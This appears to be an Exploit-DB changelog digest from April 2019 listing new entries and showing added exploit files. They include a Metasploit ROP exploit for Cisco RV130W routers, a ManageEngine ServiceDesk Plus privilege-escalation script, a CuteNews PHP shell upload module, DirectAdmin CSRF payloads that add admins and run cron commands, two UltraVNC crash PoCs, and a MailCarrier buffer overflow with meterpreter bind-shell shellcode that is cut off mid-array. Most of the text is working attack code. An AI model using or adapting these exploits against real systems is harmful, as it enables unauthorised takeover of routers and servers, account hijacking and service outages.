DB: 2019-04-16

13 changes to exploits/shellcodes

UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)
UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)
MailCarrier 2.51 - 'RCPT TO' Buffer Overflow
RemoteMouse 3.008 - Arbitrary Remote Command Execution
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)
MailCarrier 2.51 - POP3 'USER' Buffer Overflow
MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow
MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow
Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)

Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation

DirectAdmin 1.561 - Multiple Vulnerabilities

Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)
Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)

exploits/hardware/remote/46705.rb

@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# linux/armle/meterpreter/bind_tcp -> segfault
+# linux/armle/meterpreter/reverse_tcp -> segfault
+# linux/armle/meterpreter_reverse_http -> works
+# linux/armle/meterpreter_reverse_https -> works
+# linux/armle/meterpreter_reverse_tcp -> works
+# linux/armle/shell/bind_tcp -> segfault
+# linux/armle/shell/reverse_tcp -> segfault
+# linux/armle/shell_bind_tcp -> segfault
+# linux/armle/shell_reverse_tcp -> segfault
+#
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco RV130W Routers Management Interface Remote Command Execution',
+      'Description'    => %q{
+        A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
+         could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+         The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
+         An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+         A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+          system of the affected device as a high-privilege user.
+
+        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+        Note: successful exploitation may not result in a session, and as such,
+         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
+      },
+      'Author'         =>
+        [
+          'Yu Zhang', # Initial discovery
+          'Haoliang Lu', # Initial discovery
+          'T. Shiomitsu', # Initial discovery
+          'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
+        ],
+      'License'         => MSF_LICENSE,
+      'Platform'        =>  %w[linux],
+      'Arch'            =>  [ARCH_ARMLE],
+      'SessionTypes'    =>  %w[meterpreter],
+      'CmdStagerFlavor' => %w{ wget },
+      'Privileged'      => true, # BusyBox
+      'References'      =>
+        [
+          ['CVE', '2019-1663'],
+          ['BID', '107185'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
+        ],
+      'DefaultOptions' => {
+          'WfsDelay' => 10,
+          'SSL' => true,
+          'RPORT' => 443,
+          'CMDSTAGER::FLAVOR' => 'wget',
+          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+       },
+      'Targets'        =>
+        [
+          [ 'Cisco RV130/RV130W < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 27 2019',
+      'DefaultTarget'   => 0,
+      'Notes' => {
+        'Stability'   => [ CRASH_SERVICE_DOWN, ],
+      },
+    ))
+  end
+
+  def p(offset)
+    [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
+  end
+
+  def prepare_shellcode(cmd)
+    #All these gadgets are from /lib/libc.so.0
+    shellcode = rand_text_alpha(target['offset']) +       # filler
+      p(target['gadget1']) +
+      p(target['system_offset']) +                        # r2
+      rand_text_alpha(4) +                                # r6
+      p(target['gadget2']) +                              # pc
+      cmd
+    shellcode
+  end
+
+  def send_request(buffer)
+    begin
+      send_request_cgi({
+        'uri'     => '/login.cgi',
+        'method'  => 'POST',
+        'vars_post' => {
+              "submit_button": "login",
+              "submit_type": "",
+              "gui_action": "",
+              "wait_time": 0,
+              "change_action": "",
+              "enc": 1,
+              "user": rand_text_alpha_lower(5),
+              "pwd": buffer,
+              "sel_lang": "EN"
+          }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
+    end
+  end
+
+  def exploit
+    print_status('Sending request')
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+    shellcode = prepare_shellcode(cmd.to_s)
+    send_request(shellcode)
+  end
+
+  def on_new_session(session)
+    # Given there is no process continuation here, the httpd server will stop
+    # functioning properly and we need to take care of proper restart
+    # ourselves.
+    print_status("Reloading httpd service")
+    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
+    else
+      session.shell_command(reload_httpd_service)
+    end
+  ensure
+    super
+  end
+end

exploits/jsp/webapps/46659.py

@@ -0,0 +1,193 @@
+#!/usr/bin/python
+
+# Exploit Title: Manage Engine ServiceDesk Plus Version <10.0 Privilege Escalation
+# Date: 30-03-2019
+# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız
+# Vendor: ManageEngine
+# Vendor Homepage: www.manageengine.com
+# Product: Service Desk Plus
+# Version: 10.0
+# Tested On: Kali Linux
+# CVE: CVE-2019-10008
+# Platform: JSP
+
+# Timeline
+
+# 22 march 2019: Discovery
+# 24 march 2019: CVE id reserved for CVE-2019-10008
+# 26 march 2019: First contact with vendor
+# 5  april 2019: First publication
+# 10 april 2019: Vendor confirmation
+# 11 april 2019: Vendor released a fix (version 10017)
+
+
+# Reference link: https://www.manageengine.com/products/service-desk/readme.html
+
+import os
+import re
+
+
+
+# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.
+# Low username and password is an account you have access to. high_username is account you want to authenticate as.
+
+# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.
+
+
+#Host ip address + port
+host="localhost:8080"
+
+#set to https if needed
+url = "http://" + host
+
+#Username with credentials you have
+low_username="guest"
+low_password="guest"
+
+#username you want to login as
+high_username="administrator"
+
+print("\033[1;37mUrl: \033[1;32m" + url)
+print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
+print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)
+
+
+print("\033[1;32mGetting a session id\033[1;37m")
+
+# Get index page to capture a session id
+curl = "curl -i -s -k  -X $'GET' \
+    -H $'Host: "+host+"'  -H $'Referer: "+url+"/' -H $'Connection: close'\
+    $'"+url+"/'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+
+print("Sessid:")
+print(sessid)
+
+
+print("\033[1;31mLogging in with low privilege user\033[1;37m")
+
+
+#Attempt login post request 
+curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
+ -H $'Referer: "+url+"/'\
+ -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
+ -b $'JSESSIONID="+sessid+"' \
+ --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
+ hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
+ dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
+ $'"+url+"/j_security_check'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+
+#Instead of following redirects with -L, following manually because we don't need all the transactions.
+curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
+ -H $'Referer: "+url+"/'\
+ -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
+ -b $'JSESSIONID="+sessid+"' \
+ $'"+url+"/'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
+sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+print(sessid)
+sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
+print(sessidsso)
+grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)
+
+grbl2 = []
+for cookie in grbl:
+	cl = cookie.split('=')
+	if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':
+
+		grbl2.append(cl[0])
+		grbl2.append(cl[1])
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/mc/'"
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+
+print("\033[1;32mCaptured secondary sessid.\033[1;37m")
+print(sessid2)
+
+
+print("\033[1;31mDoing the magic step 1.\033[1;37m")
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+	-H $'Referer: "+url+"/mc/WOListView.do' \
+	-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+	-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+	$'"+url+"/mc/jsp/MCLogOut.jsp'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+print("\033[1;31mDoing the magic step 2.\033[1;37m")
+
+
+
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/mc/jsp/MCDashboard.jsp'"
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
+
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/'"
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+
+
+curl = "curl -i -s -k -X $'POST' \
+    -H $'"+host+"' \
+    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
+    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
+    $'"+url+"/mc/j_security_check'"
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+curl = "curl -i -s -k -X $'GET' \
+    -H $'Host: "+host+"' \
+    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
+    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
+    $'"+url+"/mc/jsp/MCDashboard.jsp'"
+
+
+
+out = os.popen('/bin/bash -c "' + curl+'"').read()
+
+
+sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
+sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
+
+print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
+print("JSESSIONID=" + sessidhigh)
+print("JSESSIONIDSSO=" + sessidssohigh)
+print(grbl2[0] + "=" + grbl2[1])
+print(grbl2[2] + "=" + grbl2[3])
+print("_rem=true")

exploits/php/remote/46698.rb

@@ -0,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution",
+      'Description' => %q(
+        This module exploits a command execution vulnerability in CuteNews prior to 2.1.2.
+        The attacker can infiltrate the server through the avatar upload process in the profile area.
+        There is no realistic control of the $imgsize function in "/core/modules/dashboard.php"
+        Header content of the file can be changed and the control can be bypassed.
+        We can use the "GIF" header for this process.
+        An ordinary user is enough to exploit the vulnerability. No need for admin user.
+        The module creates a file for you and allows RCE.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html']
+          ['URL', 'http://cutephp.com'] # Official Website
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Apr 14 2019",
+      'DefaultTarget' => 0))
+ 
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
+      ]
+    )
+  end
+
+  def exec
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url
+    })
+  end
+##
+# Login and cookie information gathering
+##
+ 
+  def login(uname, pass, check)
+    # 1st request to get cookie
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_post' => {
+        'action' => 'dologin',
+        'username' => uname,
+        'password' => pass
+      }
+    )
+
+    cookie = res.get_cookies
+    # 2nd request to cookie validation
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php"),
+      'cookie'   => cookie
+    })
+ 
+    if res.code = 200 && (res.body =~ /dashboard/)
+      return cookie     
+    end 
+
+    fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
+    return nil
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+##
+# Upload malicious file // payload integration
+##
+  def upload_shell(cookie, check)
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"),
+      'cookie'   => cookie
+    })
+
+    signkey = res.body.split('__signature_key" value="')[1].split('"')[0]
+    signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0]
+    # data preparation
+    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
+    @shell = "#{fname}"
+    pdata = Rex::MIME::Message.new
+    pdata.add_part('main', nil, nil, 'form-data; name="mod"')
+    pdata.add_part('personal', nil, nil, 'form-data; name="opt"')
+    pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"')
+    pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"')
+    pdata.add_part('', nil, nil, 'form-data; name="editpassword"')
+    pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"')
+    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"')
+    pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"")
+    pdata.add_part('', nil, nil, 'form-data; name="more[site]"')
+    pdata.add_part('', nil, nil, 'form-data; name="more[about]"')
+    data = pdata.to_s
+ 
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, "index.php")     
+    })
+
+    if res && res.code == 200 && res.body =~ /User info updated!/
+      print_status("Trying to upload #{fname}")
+      return true
+    else
+      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
+      return false
+    end
+
+  end
+##
+# Exploit controls and information
+##
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
+
+    if upload_shell(cookie, true)
+      print_good("Upload successfully.")
+      exec
+    end
+  end
+##
+# Version and Vulnerability Check
+##
+  def check
+ 
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "index.php")
+    })
+ 
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+ 
+    if res.code == 200
+      version = res.body.split('target="_blank">CuteNews ')[1].split('</a>')[0]
+      if version < '2.1.3'
+       print_status("#{peer} - CuteNews is #{version}")
+       return Exploit::CheckCode::Vulnerable
+      end
+    end
+ 
+    return Exploit::CheckCode::Safe
+  end
+end
+##
+# The end of the adventure (o_O) // AkkuS
+##

exploits/php/webapps/46694.txt

@@ -0,0 +1,69 @@
+# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
+# Date: 12.04.2019
+# Author: InfinitumIT
+# Vendor Homepage: https://www.directadmin.com/
+# Version: Up to v1.561.
+# CVE: CVE-2019-11193
+# info@infinitumit.com.tr && infinitumit.com.tr
+
+# Description:
+# Multiple security vulnerabilities has been discovered in popular server control panel DirectAdmin, by
+# InfinitumIT. Attackers can combine those security vulnerabilities and do a lot of critical action like server control takeover.
+# Those vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) may cause them to happen:
+# Add administrator, execute command remote (RCE), Full Backup the Server and Upload the Own Server, webshell upload and more.
+
+# Reflected XSS Vulnerabilities:
+# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
+# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
+# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD
+
+# Example Payloads:
+# Add Administrator:
+var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
+var params =
+"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai
+l=test%40test.com&passwd=password&passwd2=password&notify=ye";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Remote Command Execution by Cron Jobs:
+var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
+var params =
+"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Edit File:
+var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
+var params = "file=the-file-full-path&action=save&text=new-content";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+# Create FTP Account:
+var url = "http://SERVERIP:2222/CMD_FTP";
+var params =
+"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr
+&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu
+stom_val=%2Fhome%2Fusername&create=Create";
+var vuln = new XMLHttpRequest();
+vuln.open("POST", url, true);
+vuln.withCredentials = 'true';
+vuln.setRequestHeader("Content-type",
+"application/x-www-form-urlencoded");
+vuln.send(params);
+
+
+# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
+# InfinitumIT / For safer days...

exploits/windows/dos/46702.py

@@ -0,0 +1,21 @@
+#Exploit Title: UltraVNC Viewer 1.2.2.4 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-14
+#Vendor Homepage: https://www.uvnc.com/
+#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
+#Tested Version: 1.2.2.4
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_Viewer_1.2.2.4.py
+#2.- Open UltraViewer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer 
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraViewer.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46703.py

@@ -0,0 +1,22 @@
+#Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-14
+#Vendor Homepage: https://www.uvnc.com/
+#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
+#Tested Version: 1.2.2.4
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_Launcher_1.2.2.4.py
+#2.- Open UltraLauncher.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Path vncviewer.exe" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraLauncher.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/remote/46695.py

@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
+# Date: 12/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
+#0x7e4456f7 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
+#POC
+#1.) Change ip and port in code
+#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
+"\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
+"\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
+"\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
+"\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
+"\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
+"\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
+"\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
+"\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
+"\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
+"\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
+"\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
+"\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
+"\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
+"\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
+"\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
+"\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
+"\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
+"\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
+"\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
+"\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
+"\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
+"\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
+"\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
+"\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
+"\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
+"\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
+"\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
+"\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
+"\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
+"\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
+"\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
+"\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
+"\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
+"\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
+"\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
+"\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
+"\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
+"\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
+"\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
